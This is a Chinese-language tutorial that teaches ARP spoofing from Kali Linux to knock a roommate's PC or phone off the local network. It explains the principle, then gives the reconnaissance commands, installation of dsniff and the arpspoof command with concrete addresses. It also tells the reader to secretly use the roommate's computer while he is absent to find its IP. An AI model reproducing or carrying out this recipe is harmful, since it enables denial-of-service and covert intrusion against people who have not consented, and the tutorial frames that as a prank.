演示如何借助Kali Linux系统对局域网内同一网段的PC主机、手机进行 ARP 欺骗 实现对目标主机/手机的断网攻击
我们先来了解下攻击原理——ARP欺骗 (简单看一下就可以)
ARP协议ARP欺骗
地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。由于ARP缓存表不是实时更新的,如果在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 下面的演示实验将使用网关型欺骗的ARP欺骗攻击,通过欺骗受害PC主机/手机,将局域网的网关地址设置为Kali主机的IP地址, 使目标主机认为攻击者的网卡是网关,从而将数据包都发给攻击者的网卡,如果攻击者直接将数据包丢弃(不开启转发),即是断网攻击。如果攻击者的网卡再开启转发,将数据包传到真正网关,则可实现受害主机不断网。ARP断网攻击
简单来说就是就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。再简单的说,只要对局域网下任一台主机进行arp攻击,那么就可以导致这台主机断网攻击演示准备工作:
kali (攻击机)
室友的IP (手机或者电脑)
最好还有一个质量好的轮椅 (这个是重点) 收集信息:网卡名称 、被攻击者设备 、网关在kali 输入ifconfig 查看自己的IP 并且记下来
我的IP是 10.0.0.171 网卡是 eth0
现在查看 网关 输入 route -n
我的是 10.0.0.1
现在 网关有了,网卡有了,攻击机的IP也有了。 缺一个受害者的IP。也就是室友电脑或手机IP了。
偷摸趁室友不在,在他电脑上按Win+R 输入cmd,然后输入 ipconfig
10.0.0.88 就是我室友电脑的IP
开始攻击,让他断网,开始前先整理一下
网卡名称 eth0
被攻击者设备 10.0.0.88
网关 10.0.0.1
在kali 先安装工具arpspoof命令
apt-get install dsniff
具体命令:arpspoof -i 网卡名称 -t 被攻击设备IP 网关
这个原理就是。 我现在疯狂的告诉 室友电脑,网关的mac 物理地址是 我kali攻击机的mac地址。
进行对比验证
kali的 mac地址是 00:0c:29:b3:f0:af
kali 疯狂的欺骗目标机器。网关是kali
现在室友电脑上网,找的网关不是真实的网关,而是我 kali攻击机。这样室友就断网了。